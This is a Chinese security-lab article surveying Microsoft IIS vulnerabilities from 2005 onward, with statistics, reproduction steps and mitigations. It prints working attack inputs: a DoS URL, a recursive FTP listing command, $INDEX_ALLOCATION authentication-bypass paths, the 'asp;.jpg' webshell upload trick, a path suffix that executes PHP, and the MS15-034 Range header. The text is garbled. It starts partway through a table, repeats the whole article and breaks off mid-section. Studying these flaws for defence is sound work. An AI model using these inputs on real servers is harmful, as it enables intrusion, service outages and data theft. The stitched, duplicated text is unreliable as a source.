5
代码执行
4
0
4
信息泄露
2
2
4
XSS注入
1
1
2
命令执行
2
0
2
权限提升
0
2
2
文件上传
2
0
2
总计
30
5
35
 
由上表可以看到,IIS历年漏洞主要以远程漏洞为主,占漏洞总数85.71%,本地漏洞有5个,占漏洞总数14.29%。其中5个本地漏洞分别是:(MS12-073)Microsoft IIS密码信息泄露漏洞CVE-2012-2531、 Microsoft IIS源代码泄露漏洞CVE-2005-2678、 (MS17-016)Microsoft Internet信息服务器跨站脚本漏洞CVE-2017-0055、 (MS16-016)IIS WEBDAV特权提升漏洞CVE-2016-0051、 (MS08-005)Microsoft IIS 文件更改通知本地权限提升漏洞CVE-2008-0074。
以下主要针对IIS漏洞中可以远程利用的重点漏洞做分析和复现:
1.  缓冲区溢出漏洞
       1.1 (MS09-053)Microsoft IIS FTPd服务NLST命令栈缓冲区CVE-2009-3023
       1.1.1 漏洞描述:Microsoft IIS内嵌的FTP服务器中存在基于栈的缓冲区溢出漏洞。如果远程攻击者对带有特制名称的目录发布了包含有通配符的FTP NLST(NAME LIST)命令的话,就可以触发这个溢出,导致执行任意代码。仅在攻击者拥有写访问权限的情况下才可以创建带有特殊名称的目录。  
       1.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0、IIS 5.1、IIS 6.0
Ø 漏洞分析:
IIS包括用于通过TCP计算机网络交换和操作文件的FTP服务器服务。它默认侦听端口21以获取来自FTP客户端的传入连接。IIS支持的FTP命令之一是名称列表(NLST)命令。此命令用于将目录列表从服务器传输到客户端。该命令的语法如下:
NLST <SPACE> <pathname> <CRLF>,此命令中的路径名应指定目录或其他特定于系统的文件组描述符;在pathname为NULL时,使用当前目录。NLST命令可以使用诸如“*”之类的通配符来引用多个路径。
Microsoft Internet信息服务(IIS)中存在缓冲区溢出漏洞。该漏洞是由于处理NLST FTP命令时边界检查不足造成的。当FTP用户请求包含通配符的路径名过长的目录列表时,易受攻击的代码会将目录路径名复制到0x9F(159)字节的基于堆栈的缓冲区中,而不进行边界验证。提供包含大于0x9F(159)字节的路径名会使堆栈缓冲区溢出,从而可能会覆盖关键进程数据(如函数返回地址)。
远程身份验证的攻击者可以通过连接到易受攻击的IIS FTP服务器并向目标服务器发送恶意NLST命令来利用此漏洞。成功利用将导致使用System权限执行代码。如果代码执行攻击不成功,可能会导致受影响的FTP会话异常终止。
注意:为了成功利用此漏洞,NLST命令中指定的长路径名必须存在于目标系统上。因此,利用此漏洞的攻击可能伴随着MKD命令的使用。
Ø 漏洞类型:可远程利用,存在缓冲区溢出漏洞,可触发代码执行
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 搭建好IIS FTP靶机环境,测试anonymous默认匿名用户可用,且可创建和读写目录;
2. 测试正常MKD创建和NLST正常长度的目录的功能是否正常:
 
以上somefolder为FTP服务器上正常长度文件夹,NLST命令执行成功并返回结果提示226。
3. 测试创建和NLST异常目录长度,服务器返回150,打开数据连接,成功执行命令。
 
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.x和6.0版本存在,升级IIS版本或者更新MS09-053补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:IIS启用FTP服务且存在FTP默认站点、攻击者登陆FTP的账户有创建和读写文件夹的权限。
 2.  DOS拒绝服务漏洞
      2.1  (MS07-041)Microsoft IIS 5.1远程缓冲区溢出漏洞  CVE-2005-4360
      2.1.1 漏洞描述:Microsoft IIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的"执行权限"设置为"脚本和可执行程序"时才会出现这个漏洞。有漏洞的虚拟文件夹包括"/_vti_bin"等。此外如果提交恶意请求还可能会触发缓冲区溢出,导致在用户系统上执行任意代码。2.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.1
Ø 漏洞分析:IIS包括一个能够提供静态和动态内容的Web服务器组件。IIS的Web组件提供Web应用程序功能。通过Web应用程序,服务器可以在后端执行脚本,并将生成的内容提供给请求客户端。客户端可以请求许多可执行资源,例如Perl脚本、Active Server Pages(ASP)或动态链接的库资源。用于提供动态动态内容的虚拟目录需要配置后台执行脚本的权限。
Microsoft Internet Information Services产品的HTTP服务器组件中存在可远程利用的拒绝服务漏洞。在特殊情况下,当多次请求动态链接的库资源时,受影响的服务可能会因此而关闭。由于服务器无法处理格式错误的URL请求,因此创建了该漏洞。恶意请求必须满足几个条件才能触发此漏洞。请求URL必须包含来自以下字符的有限集合中的字符(注意,不可见字符需要使用以下字符范围的URL编码形式):
• %3f
• ”
• *
• :
• <
• >
•字符 - 的范围
请求还必须包含波形符“~”字符,后面跟一个十进制数字。
Ø 漏洞类型:可远程利用,可触发DOS攻击
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 配置IIS默认wwwroot根目录下的虚拟目录_vti_bin执行权限为“脚本和可执行文件”权限;
 
 
2. 浏览器发送恶意url远程访问靶机环境,复现成功,服务器返回500错误:
  Eg:http://192.168.180.200/_vti_bin/.dll/\~0
 
 
 
 
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.1版本存在,升级IIS版本或者更新MS07-041补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:要求在服务器端将请求的虚拟目录配置为“脚本和可执行文件”权限,不开启此权限的服务器不存在漏洞。
 2.2 (MS09-053)Microsoft IIS FTP服务器递归列表拒绝服务漏洞   CVE-2009-2521
      2.2.1 漏洞描述:IIS 5.0至7.0版本的FTP服务在处理递归目录列表请求时存在栈消耗漏洞。拥有对目录写访问权限的远程攻击者可以通过提交包含有通配符(如星形标识符)的请求导致拒绝服务(守护进程崩溃)。
2.2.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0、IIS 5.1、IIS 6.0、IIS 7.0
Ø 漏洞分析:
通过包含通配符的list(ls)-R命令在Microsoft IIS FTP服务器5.0到7.0中触发拒绝服务条件,即ls "-R p*/../"命令可导致FTP服务器拒绝服务。 此漏洞利用有三个条件:
(1)一个有效的ftp帐户,拥有只读或写入权限;
(2)“FTP发布”服务必须在启动类型中配置为“手动”模式;
(3) FTP根目录下至少有一个目录。
Ø 漏洞类型:可远程利用,可触发DOS攻击
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 添加FTP服务器角色,IIS信息服务管理控制台“FTP站点下”启动FTP默认站点
 
 
2. 配置ftp默认用户anonymous/anonymous,拥有读写目录权限;
3. 目录下创建一个文件夹BB,然后输入ls "-R p*/../",成功复现DOS拒绝服务,ftp连接关闭:
 
中间很多重复:
p*/../BB:
BB
 
 
FTP服务器提示“远程主机关闭连接”,FTP拒绝服务,漏洞复现成功。
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.0-7.0版本存在,升级IIS版本或者更新MS09-053补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:IIS启用FTP服务且存在FTP默认站点、攻击者登陆FTP的账户有创建和读写文件夹的权限。
 3.  认证绕过漏洞3.1  IIS认证绕过和源码泄露漏洞复现
       3.1.1 漏洞描述:Microsoft IIS(Internet Information Server)是Microsoft Windows系统默认自带的Web服务器软件,其中默认包含FTP服务。Microsoft IIS中存在认证绕过漏洞和源码泄露漏洞,该漏洞源于对用户提供的输入未经正确的验证。攻击者可利用这些漏洞在服务器进程上下文中获取密码保护资源和查看源代码文件的未授权访问,且有助于进一步攻击。
 3.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 6.0、IIS 7.5
Ø 漏洞分析:Microsoft IIS由于无法正确清理用户提供的输入,容易出现身份验证绕过漏洞和源代码泄露漏洞。主要包括以下三类绕过:
(1) 安装了PHP的Microsoft IIS 6.0身份验证绕过:
IIS / 6.0加载受保护(如:admin)目录中的PHP文件需要用户认证信息(用户名和密码访问),如果将“:: $ INDEX_ALLOCATION”后缀附加到目录名称后面,存在绕过认证并可能访问管理文件等特殊情况,导致IIS服务器重要信息泄露;
 Eg:/admin::$INDEX_ALLOCATION/index.php
(2) Microsoft IIS 7.5经典ASP身份验证绕过:
配置了经典ASP和.NET Framework 4.0的Microsoft IIS 7.5,通过将“:$ i30:$ INDEX_ALLOCATION”后缀附加到需要认证的请求目录名称后面,可以绕过经典的ASP文件访问限制;
Eg:举例:/admin:$i30:$INDEX_ALLOCATION/index.asp
(3) Microsoft IIS 7.5 .NET源代码公开和身份验证绕过:
在配置中安装了PHP的Microsoft IIS / 7.5,存在认证绕过漏洞;
Eg:http://<victimIIS75>/admin:$i30:$INDEX_ALLOCATION/admin.php
除此之外,通过将/.php附加到ASPX文件(或使用未通过请求过滤规则阻止的.NET框架的任何其他文件,如错误配置:.CS,.VB等文件)。IIS 7.5使用文件的完整源代码进行响应,并将其作为PHP代码执行。这意味着通过使用上传功能,可以(在特殊情况下)执行任意PHP代码。
Eg:  http://<victimIIS75>/Default.aspx/.php   (php任意代码执行)
Ø 漏洞类型:可远程利用,可触发认证绕过和信息泄露
Ø 漏洞复现:
复现环境:Windows 7 x64位,默认IIS 7.5
以下验证复现上述(3)的漏洞,(1)和(2)类似此处不做验证:
1. IIS网站根目录下创建admin用户目录,关闭默认用户认证,换言之,访问/admin/index.php目录下的文件需要认证信息,认证失败或者无认证信息将会返回401未授权页面;
 
 
 
 
2. 配置完成后,重启IIS服务器,浏览器远程访问此文件:http://192.168.180.207/admin/index.php,默认IIS账户访问提示401未授权;
 
3. 接下来,利用:$i30:$INDEX_ALLOCATION来绕过此限制,浏览器远程访问:
http://192.168.180.207/admin:$i30:$INDEX_ALLOCATION/index.php,成功绕过并访问到敏感信息;
 
4. 除此之外,如果目标站点限制上传和访问php文件,可以利用上传aspx(.net支持解析的文件类型)文件逃避限制,将其当做php代码执行;
Eg:网站目录下有一个index.aspx的文件,里面写有php代码,正常通过http://192.168.180.207/admin:$i30:$INDEX_ALLOCATION/index.aspx访问此文件无法执行代码,通过在末尾加上index.aspx/.php形式访问将会成功执行php代码;
 
a. 正常绕过访问index.aspx文件,页面返回乱码,未执行phpinfo代码:
 
b. 通过在末尾加上/.php,成功执行php代码:
 
Ø 漏洞缓解:
1. IIS 7.5 配置.NET Framework 2.0不受上述(2)的绕过影响;
2. 攻击者需要事先获取IIS服务器受认证保护目录;
 4.  信息泄露漏洞4.1 Microsoft IIS 短文件名泄露漏洞
        4.1.1 漏洞描述:IIS短文件名漏洞是由于HTTP请求中携带旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
        4.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0-10.0全系列版本
Ø 漏洞分析:Windows 支持以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。基于Windows的IIS服务器默认根目录C:\inetpub\wwwroot下的网页脚本文件和目录符合一定条件时,会生成相应的短文件名。此时,攻击者利用HTTP的DEBUG、OPTIONS、GET、POST、HEAD、TRACE等方法携带波浪号,可以对IIS服务器短文件名进行暴力猜解,依据返回的页面信息和状态码来确认真实存在的文件名,从而获取服务器敏感信息,为下一步攻击做准备。
Ø 漏洞类型:可远程利用,可触发信息泄露
Ø 漏洞复现:
复现环境:Windows 7 x64位,默认IIS 7.5
1. 通过cmd下进入IIS网站根目录C:\inetpub\wwwroot,输入“dir /x”查看已存在的短文件名:
 
2. 使用公开POC或者扫描程序探测目标靶机的短文件名,成功猜解到服务器根目录短文件名称:
 
 
Ø 漏洞缓解:
1. 限制IIS服务器HTTP方法,除了必要的GET、POST方法,其他HTTP方法建议关闭,视情况开启;
2. IIS服务器文件建议使用复杂字符或者中文命名,增加后期攻击者暴力破解难度;
3. 针对已存在的IIS服务器,建议关闭NTFS 8.3文件格式的支持或者修改注册表禁用短文件名功能。
注:详细原理和解决方案请参考:https://www.freebuf.com/articles/web/172561.html
 5.  代码执行漏洞
      5.1 Microsoft IIS畸形文件扩展名绕过安全限制漏洞  CVE-2009-4444
      5.1.1 漏洞描述:IIS服务器错误的执行了带有多个扩展名的文件中所包含的ASP代码。例如malicious.asp;.jpg被执行为了ASP文件。很多文件上传程序仅检查文件扩展名的最后部分,因此这可能导致绕过保护机制向服务器上传恶意可执行文件。
      5.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 6.0
Ø 漏洞分析:此漏洞主要原因是IIS第三方上传应用没有限制文件上传格式或者限制不够严格,只检查了文件末尾的格式,导致攻击者可以将如Asp webshell伪装成malicious.asp;.jpg文件格式上传到IIS服务器。IIS的Classic ASP功能在处理asp文件时,被此畸形文件格式的分号截断了,认为是asp文件并进行相应的解析处理。攻击者则在获取上传路径后通过远程访问执行此webshell,控制IIS服务器甚至Windows宿主机器。
Ø 漏洞类型:可远程利用,文件上传绕过可触发代码执行
Ø 漏洞复现:
复现环境:Win server 2003 Sp2 32位企业版,默认IIS 6.0
1. IIS服务器根目录下创建一个名为aspwebshell.asp;.jpg的文件,用记事本打开,放入asp webshell代码(实际利用过程中是通过第三方应用上传绕过漏洞上传此文件,并设法获取此上传路径);
 
2. 通过浏览器远程访问此文件,http://192.168.180.201/aspwebshell.asp;.jpg,成功执行asp webshell代码:
 
 
Ø 漏洞缓解:
1. 严格限制IIS第三方应用上传文件的格式;
2. 此漏洞仅影响IIS 6.0,其他版本解析asp文件不会被分号截断,可升级至无此漏洞的IIS版本。
   5.2 (MS15-034)Microsoft IIS远程代码执行漏洞复现  CVE-2015-1635 
      5.2.1 漏洞描述:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。           5.2.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 7.5、IIS 8.0、IIS 8.5
Ø 漏洞分析:
    IIS进程w3wp.exe接收到HTTP请求后,将数据缓存到内核中,并整合HTTP回应头,最后由http.sys组织数据包经由网络内核组件发送出去。请求中包括Range对象的指定范围,而缓存中则包含了http文件和大小信息等。
 根据公开POC,构造包含“Range: bytes=0-18446744073709551615”的HTTP请求并发送到IIS 7.5-8.5服务器,如果IIS服务器返回“Requested Range Not Satisfiable”,则存在漏洞,如果返回“The request has an invalid header name”或者没有回应,则说明漏洞已经修补或者不存在漏洞。
Ø 漏洞类型:可远程利用,可触发代码执行
Ø 漏洞复现:
 复现环境:Win server 2008 R2 64位企业版,默认IIS 7.5
1. 开启IIS默认网站
2. 根据公开poc发送包含特殊设计的Range字段攻击靶机环境,成功检测到漏洞:
 
Ø 漏洞缓解:
1. 禁用 IIS 内核缓存,详情见微软官方公告:
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034
2. 升级IIS至IIS 10.0版本,此版本不存在此漏洞。
 三、 漏洞总结
IIS 远程漏洞主要包括缓冲区溢出、认证绕过、拒绝服务、代码执行和信息泄露漏洞,本地漏洞主要分布在信息泄露和权限提升漏洞分类,大部分漏洞利用难度较大,但是一旦成功被攻击者利用,影响的不仅仅只是IIS服务器,甚至可能是运行IIS的Windows主机。如果用户主机被利用,那么攻击者可以将此台主机当作肉鸡攻击内网中的其他主机、服务器或者网络设备等,后果不堪设想。
  如果IIS服务器的网站配置不当,攻击者可以通过IIS短文件名猜解和暴力破解用户隐私文件并进行认证绕过访问,获取用户隐私信息。此外,不合理的上传限制也会导致攻击者上传含有恶意代码或webshell并伪装成合法的文件,进而导致IIS服务器被攻陷。攻击者利用提权漏洞或者命令执行等漏洞,对IIS服务器甚至是Windows操作系统进行进一步的攻击。无论是对IIS服务器本身的服务还是该IIS服务器所处的网络环境,IIS漏洞都是一个极大的隐患,也让IIS网站管理员和不少运维人员心惊胆战。 查看全部
本文转自安全脉搏,为千里目实验室所写。
原文链接:https://www.secpulse.com/archives/82410.html​ 
一、 全球第三大网络服务器
Internet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 2000、Windows XP Professional、Windows Server 2003和后续版本一起发行。IIS目前只适用于Windows系统,不适用于其他操作系统。
根据Netcraft在2018年9月的最新全球Web服务器报告显示,Microsoft IIS依旧以9.57%的比例占据全球第三大最繁忙服务器,落后于Apache 34.07%和Nginx 25.45%。目前流行的Windows版本都默认安装IIS服务,但同时IIS的安全性一直被业内诟病,一旦IIS出现高危漏洞,将会出现范围广、影响深的特点。
 
目前IIS一共发行12个版本,从IIS 1.0版本至IIS 10.0版本,IIS 1.0-4.0已经基本退出市场,IIS 5.0-10.0是Web市场主要使用的网站服务器。随着Windows版本发布和不断更新,IIS自身的安全性也有了较大的提升。在2005-2018年期间,IIS漏洞呈现逐年减少的趋势,同时也说明了IIS漏洞POC公布越来越少、漏洞挖掘的难度也在提升。
 
IIS 版本
Win版本
IIS全球装机数量
受影响漏洞数量
IIS 1.0
Win NT 3.51
0
未统计
IIS 2.0
Win NT 4.0
0
未统计
IIS 3.0
Win NT 4.0 Sp3
0
未统计
IIS 4.0
Win NT 4.0选项包
0
未统计
IIS 5.0
Windows 2000
46,078
10个
IIS 5.1
Windows XP 系列
29,825
16个
IIS 6.0
Win 2003和Win XP Pro x64
620,360
21个
IIS 7.0
Win 2008、 Vista全系列
276,736
11个
IIS 7.5
Win 7和Win 2008 R2
3,970,245
12个
IIS 8.0
Win 8和Win 2012
344,734
4个
IIS 8.5
Win 8.1和Win 2012 R2
2,153,546
4个
IIS 10.0
Win 10和Win 2016
1,086,887
2个
 
从上述IIS漏洞统计表格可以看出,IIS 7.5、IIS 8.5和IIS 10.0是目前全球使用最多的三款IIS版本,分别对应受影响漏洞12个、4个和2个,呈现受影响漏洞数量递减的趋势。同时,在历年的IIS版本漏洞中,IIS 6.0、IIS 5.1、IIS 7.5和IIS 7.0受影响的漏洞数居前四位。
 二、 IIS漏洞分析
千里目实验室针对IIS近十几年(2005年以后)的35个漏洞进行和整理和分析,IIS漏洞主要分布在缓冲区溢出、认证绕过、DOS拒绝服务、代码执行和信息泄露,其中以MS15-034远程代码执行漏洞最为严重。
 
 
 
 
IIS漏洞类型
远程漏洞
本地漏洞
数量
缓冲区溢出
7
0
7
认证绕过
7
0
7
拒绝服务
5
0
5
代码执行
4
0
4
信息泄露
2
2
4
XSS注入
1
1
2
命令执行
2
0
2
权限提升
0
2
2
文件上传
2
0
2
总计
30
5
35
 
由上表可以看到,IIS历年漏洞主要以远程漏洞为主,占漏洞总数85.71%,本地漏洞有5个,占漏洞总数14.29%。其中5个本地漏洞分别是:(MS12-073)Microsoft IIS密码信息泄露漏洞CVE-2012-2531、 Microsoft IIS源代码泄露漏洞CVE-2005-2678、 (MS17-016)Microsoft Internet信息服务器跨站脚本漏洞CVE-2017-0055、 (MS16-016)IIS WEBDAV特权提升漏洞CVE-2016-0051、 (MS08-005)Microsoft IIS 文件更改通知本地权限提升漏洞CVE-2008-0074。
以下主要针对IIS漏洞中可以远程利用的重点漏洞做分析和复现:
1.  缓冲区溢出漏洞
       1.1 (MS09-053)Microsoft IIS FTPd服务NLST命令栈缓冲区CVE-2009-3023
       1.1.1 漏洞描述:Microsoft IIS内嵌的FTP服务器中存在基于栈的缓冲区溢出漏洞。如果远程攻击者对带有特制名称的目录发布了包含有通配符的FTP NLST(NAME LIST)命令的话,就可以触发这个溢出,导致执行任意代码。仅在攻击者拥有写访问权限的情况下才可以创建带有特殊名称的目录。  
       1.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0、IIS 5.1、IIS 6.0
Ø 漏洞分析:
IIS包括用于通过TCP计算机网络交换和操作文件的FTP服务器服务。它默认侦听端口21以获取来自FTP客户端的传入连接。IIS支持的FTP命令之一是名称列表(NLST)命令。此命令用于将目录列表从服务器传输到客户端。该命令的语法如下:
NLST <SPACE> <pathname> <CRLF>,此命令中的路径名应指定目录或其他特定于系统的文件组描述符;在pathname为NULL时,使用当前目录。NLST命令可以使用诸如“*”之类的通配符来引用多个路径。
Microsoft Internet信息服务(IIS)中存在缓冲区溢出漏洞。该漏洞是由于处理NLST FTP命令时边界检查不足造成的。当FTP用户请求包含通配符的路径名过长的目录列表时,易受攻击的代码会将目录路径名复制到0x9F(159)字节的基于堆栈的缓冲区中,而不进行边界验证。提供包含大于0x9F(159)字节的路径名会使堆栈缓冲区溢出,从而可能会覆盖关键进程数据(如函数返回地址)。
远程身份验证的攻击者可以通过连接到易受攻击的IIS FTP服务器并向目标服务器发送恶意NLST命令来利用此漏洞。成功利用将导致使用System权限执行代码。如果代码执行攻击不成功,可能会导致受影响的FTP会话异常终止。
注意:为了成功利用此漏洞,NLST命令中指定的长路径名必须存在于目标系统上。因此,利用此漏洞的攻击可能伴随着MKD命令的使用。
Ø 漏洞类型:可远程利用,存在缓冲区溢出漏洞,可触发代码执行
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 搭建好IIS FTP靶机环境,测试anonymous默认匿名用户可用,且可创建和读写目录;
2. 测试正常MKD创建和NLST正常长度的目录的功能是否正常:
 
以上somefolder为FTP服务器上正常长度文件夹,NLST命令执行成功并返回结果提示226。
3. 测试创建和NLST异常目录长度,服务器返回150,打开数据连接,成功执行命令。
 
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.x和6.0版本存在,升级IIS版本或者更新MS09-053补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:IIS启用FTP服务且存在FTP默认站点、攻击者登陆FTP的账户有创建和读写文件夹的权限。
 2.  DOS拒绝服务漏洞
      2.1  (MS07-041)Microsoft IIS 5.1远程缓冲区溢出漏洞  CVE-2005-4360
      2.1.1 漏洞描述:Microsoft IIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的"执行权限"设置为"脚本和可执行程序"时才会出现这个漏洞。有漏洞的虚拟文件夹包括"/_vti_bin"等。此外如果提交恶意请求还可能会触发缓冲区溢出,导致在用户系统上执行任意代码。2.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.1
Ø 漏洞分析:IIS包括一个能够提供静态和动态内容的Web服务器组件。IIS的Web组件提供Web应用程序功能。通过Web应用程序,服务器可以在后端执行脚本,并将生成的内容提供给请求客户端。客户端可以请求许多可执行资源,例如Perl脚本、Active Server Pages(ASP)或动态链接的库资源。用于提供动态动态内容的虚拟目录需要配置后台执行脚本的权限。
Microsoft Internet Information Services产品的HTTP服务器组件中存在可远程利用的拒绝服务漏洞。在特殊情况下,当多次请求动态链接的库资源时,受影响的服务可能会因此而关闭。由于服务器无法处理格式错误的URL请求,因此创建了该漏洞。恶意请求必须满足几个条件才能触发此漏洞。请求URL必须包含来自以下字符的有限集合中的字符(注意,不可见字符需要使用以下字符范围的URL编码形式):
• %3f
• ”
• *
• :
• <
• >
•字符 - 的范围
请求还必须包含波形符“~”字符,后面跟一个十进制数字。
Ø 漏洞类型:可远程利用,可触发DOS攻击
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 配置IIS默认wwwroot根目录下的虚拟目录_vti_bin执行权限为“脚本和可执行文件”权限;
 
 
2. 浏览器发送恶意url远程访问靶机环境,复现成功,服务器返回500错误:
  Eg:http://192.168.180.200/_vti_bin/.dll/\~0
 
 
 
 
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.1版本存在,升级IIS版本或者更新MS07-041补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:要求在服务器端将请求的虚拟目录配置为“脚本和可执行文件”权限,不开启此权限的服务器不存在漏洞。
 2.2 (MS09-053)Microsoft IIS FTP服务器递归列表拒绝服务漏洞   CVE-2009-2521
      2.2.1 漏洞描述:IIS 5.0至7.0版本的FTP服务在处理递归目录列表请求时存在栈消耗漏洞。拥有对目录写访问权限的远程攻击者可以通过提交包含有通配符(如星形标识符)的请求导致拒绝服务(守护进程崩溃)。
2.2.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0、IIS 5.1、IIS 6.0、IIS 7.0
Ø 漏洞分析:
通过包含通配符的list(ls)-R命令在Microsoft IIS FTP服务器5.0到7.0中触发拒绝服务条件,即ls "-R p*/../"命令可导致FTP服务器拒绝服务。 此漏洞利用有三个条件:
(1)一个有效的ftp帐户,拥有只读或写入权限;
(2)“FTP发布”服务必须在启动类型中配置为“手动”模式;
(3) FTP根目录下至少有一个目录。
Ø 漏洞类型:可远程利用,可触发DOS攻击
Ø 漏洞复现:
复现环境:Win XP SP3 x64专业版,默认IIS 5.1
1. 添加FTP服务器角色,IIS信息服务管理控制台“FTP站点下”启动FTP默认站点
 
 
2. 配置ftp默认用户anonymous/anonymous,拥有读写目录权限;
3. 目录下创建一个文件夹BB,然后输入ls "-R p*/../",成功复现DOS拒绝服务,ftp连接关闭:
 
中间很多重复:
p*/../BB:
BB
 
 
FTP服务器提示“远程主机关闭连接”,FTP拒绝服务,漏洞复现成功。
Ø 漏洞缓解:
1. 此漏洞仅在IIS 5.0-7.0版本存在,升级IIS版本或者更新MS09-053补丁即可规避此漏洞;
2. 此漏洞成功利用的条件主要包括:IIS启用FTP服务且存在FTP默认站点、攻击者登陆FTP的账户有创建和读写文件夹的权限。
 3.  认证绕过漏洞3.1  IIS认证绕过和源码泄露漏洞复现
       3.1.1 漏洞描述:Microsoft IIS(Internet Information Server)是Microsoft Windows系统默认自带的Web服务器软件,其中默认包含FTP服务。Microsoft IIS中存在认证绕过漏洞和源码泄露漏洞,该漏洞源于对用户提供的输入未经正确的验证。攻击者可利用这些漏洞在服务器进程上下文中获取密码保护资源和查看源代码文件的未授权访问,且有助于进一步攻击。
 3.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 6.0、IIS 7.5
Ø 漏洞分析:Microsoft IIS由于无法正确清理用户提供的输入,容易出现身份验证绕过漏洞和源代码泄露漏洞。主要包括以下三类绕过:
(1) 安装了PHP的Microsoft IIS 6.0身份验证绕过:
IIS / 6.0加载受保护(如:admin)目录中的PHP文件需要用户认证信息(用户名和密码访问),如果将“:: $ INDEX_ALLOCATION”后缀附加到目录名称后面,存在绕过认证并可能访问管理文件等特殊情况,导致IIS服务器重要信息泄露;
 Eg:/admin::$INDEX_ALLOCATION/index.php
(2) Microsoft IIS 7.5经典ASP身份验证绕过:
配置了经典ASP和.NET Framework 4.0的Microsoft IIS 7.5,通过将“:$ i30:$ INDEX_ALLOCATION”后缀附加到需要认证的请求目录名称后面,可以绕过经典的ASP文件访问限制;
Eg:举例:/admin:$i30:$INDEX_ALLOCATION/index.asp
(3) Microsoft IIS 7.5 .NET源代码公开和身份验证绕过:
在配置中安装了PHP的Microsoft IIS / 7.5,存在认证绕过漏洞;
Eg:http://<victimIIS75>/admin:$i30:$INDEX_ALLOCATION/admin.php
除此之外,通过将/.php附加到ASPX文件(或使用未通过请求过滤规则阻止的.NET框架的任何其他文件,如错误配置:.CS,.VB等文件)。IIS 7.5使用文件的完整源代码进行响应,并将其作为PHP代码执行。这意味着通过使用上传功能,可以(在特殊情况下)执行任意PHP代码。
Eg:  http://<victimIIS75>/Default.aspx/.php   (php任意代码执行)
Ø 漏洞类型:可远程利用,可触发认证绕过和信息泄露
Ø 漏洞复现:
复现环境:Windows 7 x64位,默认IIS 7.5
以下验证复现上述(3)的漏洞,(1)和(2)类似此处不做验证:
1. IIS网站根目录下创建admin用户目录,关闭默认用户认证,换言之,访问/admin/index.php目录下的文件需要认证信息,认证失败或者无认证信息将会返回401未授权页面;
 
 
 
 
2. 配置完成后,重启IIS服务器,浏览器远程访问此文件:http://192.168.180.207/admin/index.php,默认IIS账户访问提示401未授权;
 
3. 接下来,利用:$i30:$INDEX_ALLOCATION来绕过此限制,浏览器远程访问:
http://192.168.180.207/admin:$i30:$INDEX_ALLOCATION/index.php,成功绕过并访问到敏感信息;
 
4. 除此之外,如果目标站点限制上传和访问php文件,可以利用上传aspx(.net支持解析的文件类型)文件逃避限制,将其当做php代码执行;
Eg:网站目录下有一个index.aspx的文件,里面写有php代码,正常通过http://192.168.180.207/admin:$i30:$INDEX_ALLOCATION/index.aspx访问此文件无法执行代码,通过在末尾加上index.aspx/.php形式访问将会成功执行php代码;
 
a. 正常绕过访问index.aspx文件,页面返回乱码,未执行phpinfo代码:
 
b. 通过在末尾加上/.php,成功执行php代码:
 
Ø 漏洞缓解:
1. IIS 7.5 配置.NET Framework 2.0不受上述(2)的绕过影响;
2. 攻击者需要事先获取IIS服务器受认证保护目录;
 4.  信息泄露漏洞4.1 Microsoft IIS 短文件名泄露漏洞
        4.1.1 漏洞描述:IIS短文件名漏洞是由于HTTP请求中携带旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
        4.1.2 漏洞分析和复现
Ø 漏洞影响版本:IIS 5.0-10.0全系列版本
